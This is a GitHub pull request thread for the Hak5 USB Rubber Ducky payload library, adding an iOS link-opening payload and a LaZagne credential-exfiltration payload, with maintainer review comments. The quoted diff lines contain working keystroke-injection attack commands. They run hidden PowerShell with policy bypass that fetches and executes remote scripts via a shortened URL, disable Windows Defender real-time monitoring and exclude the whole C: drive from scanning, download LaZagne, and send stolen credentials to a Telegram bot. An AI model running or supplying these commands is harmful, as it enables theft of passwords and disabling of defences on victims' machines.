New IOS Payload - Open Link
hak5/usbrubberducky-payloads pull request #410
Opened 2023-12-16 21:02 UTC by Mr-Proxy-source

This is payload for opening link through the spotlight on IOS 17 and older version, tested on multiple devices. This is one of the fastest ways to open links.

2023-12-18 01:03 UTC, Mr-Proxy-source commented
Added Exfiltration using Lazagne application and sending results through telegram bot

2023-12-18 15:01 UTC, Mr-Proxy-source commented
Added little fix for Copy and Waste payload

2024-01-02 18:54 UTC, dallaswinger commented on payloads/library/exfiltration/Google-Exfil/payload.txt
> +STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads

2024-01-02 18:55 UTC, dallaswinger commented on payloads/library/exfiltration/Lazagne-Exfil/payload.txt
> +STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-to
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads

2024-01-02 18:55 UTC, dallaswinger commented on payloads/library/mobile/iOS/Open_Link/payload.txt
> +REM Put your link down there ↓
use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

2024-01-02 18:55 UTC, dallaswinger commented on payloads/library/exfiltration/Google-Exfil/payload.txt
> +STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex
also, use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

2024-01-02 18:55 UTC, dallaswinger commented on payloads/library/exfiltration/Lazagne-Exfil/payload.txt
> +STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-to
also, use DEFINE
https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#payload-configuration

2024-01-02 21:18 UTC, Mr-Proxy-source commented on payloads/library/mobile/iOS/Open_Link/payload.txt
> +REM Put your link down there ↓
Added defining for url.

2024-01-02 21:55 UTC, Mr-Proxy-source commented
All requested changes have been made, if there is anything else let me know.
Happy new year btw :D

2024-06-17 20:09 UTC, hak5peaks requested changes

2024-06-17 20:09 UTC, hak5peaks commented on payloads/library/exfiltration/Lazagne-Exfil/payload.txt
> +STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TO
the only `DEFINE` being called is for `SCRIPT_URL`.  You need to add `#` to your defines. for example:

```
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1


STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"
```
its not required you do it with `SCRIPT_URL`  its still highly recommended.

2024-07-02 10:14 UTC, Mr-Proxy-source commented on payloads/library/exfiltration/Lazagne-Exfil/payload.txt
> +STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TO
I did it my bad i forgot to add #

2024-07-02 10:15 UTC, Mr-Proxy-source commented
Here i fixed it lmk if there is anything else.

2024-07-02 18:02 UTC, hak5peaks requested changes

2024-07-03 13:14 UTC, Mr-Proxy-source commented on payloads/library/exfiltration/Copy-And-Waste/payload.txt
>  REM     Target: Windows 10, 11
i saw there is reports on discord server that there is a problem so i just wanted to help

2024-07-03 13:15 UTC, Mr-Proxy-source commented on payloads/library/exfiltration/Copy-And-Waste/payload.txt
>  REM     Target: Windows 10, 11
if its problem im going to remove these changes.

2024-07-03 16:35 UTC, hak5peaks commented on payloads/library/exfiltration/Copy-And-Waste/payload.txt
>  REM     Target: Windows 10, 11
I suggest removing the changes and opening a new PR requesting changes to that payload directly so the author can also review the changes.

2024-07-08 18:06 UTC, hak5peaks requested changes

2024-07-08 18:06 UTC, hak5peaks commented on payloads/library/exfiltration/Lazagne-Exfil/payload.ps1
> +Start-BitsTransfer -Source "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -Destination "$Test/l.exe"
Please remove and replace this with example.com and include instructions inside your readme on where to download and how to include it inside of your powershell script.

2024-07-09 23:36 UTC, Mr-Proxy-source commented on payloads/library/mobile/iOS/Open_Link/payload.txt
> +DEFINE TARGET_URL https://hak5.org
Done.

2024-07-09 23:41 UTC, Mr-Proxy-source commented on payloads/library/exfiltration/Lazagne-Exfil/payload.ps1
> +Start-BitsTransfer -Source "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -Destination "$Test/l.exe"
Done.

2024-07-11 14:51 UTC, merged